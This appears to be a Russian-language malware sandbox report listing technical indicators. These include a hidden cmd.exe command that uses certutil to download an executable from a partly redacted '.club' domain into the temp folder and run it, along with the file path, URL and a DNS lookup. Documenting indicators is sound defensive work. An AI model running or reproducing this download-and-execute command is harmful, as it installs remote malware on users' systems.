Техническая информация
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f http://on#.##iriss.club/fo/3s.exe %tmp%/mkiprn.exe && %tmp%/mkiprn.exe
- %TEMP%\mkiprn.exe
- http://on#.##iriss.club/fo/3s.exe
- DNS ASK on#.##iriss.club
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f http://on#.##iriss.club/fo/3s.exe %tmp%/mkiprn.exe && %tmp%/mkiprn.exe' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://on#.##iriss.club/fo/3s.exe %LOCALAPPDATA%\Temp/mkiprn.exe